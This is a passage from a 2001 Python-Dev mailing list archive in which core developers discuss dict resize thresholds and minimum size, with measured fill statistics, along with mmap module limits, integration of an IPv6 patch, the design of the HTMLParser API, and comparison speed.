creation and destruction times) seems to account for no more than 2%; and the overhead due to using the slower lookdict (as opposed to lookdict_string) even less. Jeremy cheated by running a profiler: the true cause is that dictresize gets called about twice as often. Before 2.1: *before* inserting an item, we checked to see whether the dict was at the resize point. If so, we resized it. Note that this meant PyDict_SetItem could grow a dict even if no new entry was made (and that this was the cause of several excruciating bugs in the 2.1 release cycle, since it meant a dict could get reshuffled merely when replacing the values associated with existing keys). 2.1: *after* inserting an item, and if the key was new (i.e., the dict grew a new entry, as opposed to just replacing the value associated with an existing key), and the dict is at the resize point, we resize it. Now the DictCreation test overwhelmingly creates dicts of size exactly 3. The dict resizes from empty to capacity 4 on the way to gaining 2 entries. When adding the third: Before 2.1: 2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up remaining a capacity-4 dict with 3 slots full. This actually violates a documented dict invariant (i.e., that dicts are never more than 2/3rd full). 2.1: The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we *do* resize it, and the dict ends up with 3 of 8 slots full. I've got no interest in trying to restore the old behavior. A compromise may be to boost the minimum size of a non-empty dict from 4 to 8. As is, the only non-empty dicts that can get away with using the current minimum size of 4 have no more than 2 elements. The question is whether such tiny non-empty dicts are common enough to make everyone else pay for "an extra" resize. go-ahead-just-*try*-to-prove-your-answer-ly y'rs - tim From skip at pobox.com Fri May 18 01:21:50 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 18:21:50 -0500 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <15108.23822.538016.564151@beluga.mojam.com> Guido> In certain circles IPv6 support in Python would be enough to Guido> switch programming languages... :-) Sounds like someone has caught the scent of world domination... ;-) S From jeremy at digicool.com Thu May 17 20:39:07 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 14:39:07 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.6859.810306.811326@slothrop.digicool.com> Another option is to change the benchmark to put one more item in the dict. Then the same number of resizes would occur with both versions of Python. Jeremy From tim.one at home.com Fri May 18 02:08:13 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:08:13 -0400 Subject: [Python-Dev] mmap module In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu> Message-ID: [Paul Barrett] > In the CVS log of the mmapmodule.c, Tim Peters says: > > "The code really needs to be rethought from scratch (not by me, though > ...)." That was in specific reference to the code I changed, in mmap_find_method. The difficulty is that mmap is great for "large files", but the code before my change used a C int for the starting offset and also for the return value; I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 bytes). The mmap_object struct uses size_t to declare the relevant members, which is possibly better still than C long, but may still leave platform capabilities out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit offsets when creating a mapped file view). C is a friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range of C integral types anyway. In other words, if this code is ever to reach its full potential, it "really needs to be rethought from scratch". > Well, I might be the person to do the rethinking, but I'd first like > to know what Tim has in mind. Nothing that you did . > I've been playing around with this module lately and tend to agree > that some enhancements could be made, particularly to prevent "bus > errors" and "segmentation faults". When you get one of those, it's a bug in Python! > The ability to have offsets into a file that are not multiples of the > system pagesize would also be nice. It's OS-specific. Python should grow warts to protect against it on the OSes that care. > I'd be willing to submit a PEP on a new mmapmodule, once I know what > others would like. Hard to say. This has the potential to become Python's next thread subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If you do write a PEP, I vote to say that we'll cover Windows and Linux (and maybe Mac OS X?) out of the box, but any other platform is at your own risk (it doesn't really help if somebody pops up volunteering to support a minority platform, because they eventually go away, their code stops working, and it never gets fixed -- so it's use-at-your-own-risk in reality regardless). From tim.one at home.com Fri May 18 02:29:18 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 20:29:18 -0400 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: [Guido van Rossum] > What's out IPv6 story? Ah! If that's version 6 of the Integer-Point alternative to Floating-Point, I've got it covered. Otherwise my guess is we have no story at all. > I recall that someone once sent me patches, but they didn't work for me. Try recompiling with -DLONG_BIT=33. > Is it time to try again? In certain circles IPv6 support in Python > would be enough to switch programming languages... :-) Floating-point is *that* bad?! ever-helpful-ly y'rs - tim From jeremy at digicool.com Fri May 18 00:16:15 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 17 May 2001 18:16:15 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: References: Message-ID: <15108.19887.534514.864376@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> I've got no interest in trying to restore the old behavior. A TP> compromise may be to boost the minimum size of a non-empty dict TP> from 4 to 8. As is, the only non-empty dicts that can get away TP> with using the current minimum size of 4 have no more than 2 TP> elements. The question is whether such tiny non-empty dicts are TP> common enough to make everyone else pay for "an extra" resize. I also did a profile run on CreateInstances, which has a difference of +55.54% on my machine. It's basically the same story. The instance dictionary is getting resized more often with Python 2.1+ than it did with Python 1.5.2. I wouldn't be surprised if several more tests are showing a slowdown with the same cause. So boosting the minimum size sounds like a good thing. Jeremy From tim.one at home.com Fri May 18 05:26:52 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 17 May 2001 23:26:52 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff> Message-ID: [/F] > more info here: > > http://home.rica.net/alphae/419coal/index.htm > > "A Five Billion US$ (as of 1996, much more now) worldwide > Scam which has run since the early 1980's under Successive > Governments of Nigeria. > > "The Nigerian Scam is, according to published reports, the > Third to Fifth largest industry in Nigeria." Most interesting to me is that US Post Office is upset about this: http://www.usps.gov/websites/depart/inspect/pressrel.htm They don't seem to care so much that people are getting scammed, but that the letters mailed from Nigeria to advance the fee-extorting phase of the scam often use counterfeit postage! Where else but here http://www.usps.gov/websites/depart/inspect/metercap.htm could you learn that "Postage meters are not used in Nigeria -? therefore, all postage meter impressions on Nigerian mail are counterfeit!"? governments-are-mostly-insane-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Fri May 18 06:45:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Fri, 18 May 2001 06:45:21 +0200 Subject: [Python-Dev] IPv6 References: Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de> > What's out IPv6 story? I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) It's still on SF, http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470 There are two problems with that patch, AFAICT: 1. It is too large for any individual to review in one chunk. 2. It gets quickly outdated. 3. It touches core aspects of the socket handling that are IMO better untouched. I don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF actually misses some files). The third patch should include changes to the C modules, and the last one changes to the standard library modules. For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch is sitting there since 2000-08-16, making it the oldes open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'ld also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fixing them, or stay away from CVS while it is being integrated. Regards, Martin From tim at digicool.com Fri May 18 09:17:07 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it . I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots). Across the test suite, here's the ranking, from most to least popular fill: count fill %total cumulative % ------ ---- ------ ------------ 146321 1 53.30 53.30 38200 0 13.91 67.21 32616 2 11.88 79.09 29648 3 10.80 89.89 9884 5 3.60 93.49 5423 4 1.98 95.47 2428 6 0.88 96.35 2016 8 0.73 97.08 1179 7 0.43 97.51 904 9 0.33 97.84 709 103 0.26 98.10 554 10 0.20 98.30 513 13 0.19 98.49 459 12 0.17 98.66 447 11 0.16 98.82 364 14 0.13 98.95 233 15 0.08 99.04 231 16 0.08 99.12 193 18 0.07 99.19 180 17 0.07 99.26 122 19 0.04 99.30 107 30 0.04 99.34 105 21 0.04 99.38 93 22 0.03 99.41 93 20 0.03 99.45 86 256 0.03 99.48 82 23 0.03 99.51 80 26 0.03 99.54 74 24 0.03 99.56 69 27 0.03 99.59 64 25 0.02 99.61 60 29 0.02 99.63 49 28 0.02 99.65 44 34 0.02 99.67 33 32 0.01 99.68 28 31 0.01 99.69 27 37 0.01 99.70 27 33 0.01 99.71 26 35 0.01 99.72 24 36 0.01 99.73 23 39 0.01 99.74 23 38 0.01 99.75 21 128 0.01 99.75 19 44 0.01 99.76 19 40 0.01 99.77 17 46 0.01 99.77 16 48 0.01 99.78 15 47 0.01 99.78 14 50 0.01 99.79 14 42 0.01 99.79 There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count. Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full. That is, change the resize test from mp->ma_fill*3 >= mp->ma_size*2 to mp->ma_fill*4 > mp->ma_size*3 That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin . From mal at lemburg.com Fri May 18 09:26:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. FYI, I have a patch which inlines small dictionaries directly into the type object (rather than usin malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the bext performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim at digicool.com Fri May 18 10:32:39 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the bext performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling . From mal at lemburg.com Fri May 18 13:36:28 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 18 13:38:39 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding out performance issues about hot-spots -- there's no such thing as a "typical program", so pybench gives you low level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At least gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it . I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots). Across the test suite, here's the ranking, from most to > least popular fill: > > count fill %total cumulative % > ------ ---- ------ ------------ > 146321 1 53.30 53.30 > 38200 0 13.91 67.21 > 32616 2 11.88 79.09 > 29648 3 10.80 89.89 > 9884 5 3.60 93.49 > 5423 4 1.98 95.47 > 2428 6 0.88 96.35 > 2016 8 0.73 97.08 > 1179 7 0.43 97.51 > 904 9 0.33 97.84 > 709 103 0.26 98.10 > 554 10 0.20 98.30 > 513 13 0.19 98.49 > 459 12 0.17 98.66 > 447 11 0.16 98.82 > 364 14 0.13 98.95 > 233 15 0.08 99.04 > 231 16 0.08 99.12 > 193 18 0.07 99.19 > 180 17 0.07 99.26 > 122 19 0.04 99.30 > 107 30 0.04 99.34 > 105 21 0.04 99.38 > 93 22 0.03 99.41 > 93 20 0.03 99.45 > 86 256 0.03 99.48 > 82 23 0.03 99.51 > 80 26 0.03 99.54 > 74 24 0.03 99.56 > 69 27 0.03 99.59 > 64 25 0.02 99.61 > 60 29 0.02 99.63 > 49 28 0.02 99.65 > 44 34 0.02 99.67 > 33 32 0.01 99.68 > 28 31 0.01 99.69 > 27 37 0.01 99.70 > 27 33 0.01 99.71 > 26 35 0.01 99.72 > 24 36 0.01 99.73 > 23 39 0.01 99.74 > 23 38 0.01 99.75 > 21 128 0.01 99.75 > 19 44 0.01 99.76 > 19 40 0.01 99.77 > 17 46 0.01 99.77 > 16 48 0.01 99.78 > 15 47 0.01 99.78 > 14 50 0.01 99.79 > 14 42 0.01 99.79 > > There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap. I found that instance dictionaries are usual within the 8 slot range. You normally have a few heavy wheight instances and many light wheight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from > > mp->ma_fill*3 >= mp->ma_size*2 > > to > > mp->ma_fill*4 > mp->ma_size*3 > > That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin . Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 17:05:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. (I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Fri May 18 17:00:21 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benifit tuples even more than lists or dicts. At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake at acm.org Fri May 18 17:12:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Fri May 18 17:27:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Fri May 18 17:36:39 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas at xs4all.net Fri May 18 17:36:42 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benifit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee? :-) No, after my last meeting, before my first witbier of the friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Fri May 18 17:49:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 18 18:57:34 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. :-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 19:37:33 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than usin malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido at digicool.com Fri May 18 19:43:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 20:15:59 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (ie. its O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. Its not clear to me though if it would be a win. Assuming that interned strings are the most common key, a assocation table with four entries would take on average two pointer compares to look up a value. Neil From mal at lemburg.com Fri May 18 20:15:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 20:23:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > Its not clear to me though if it would be a win. Assuming that > interned strings are the most common key, a assocation table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: 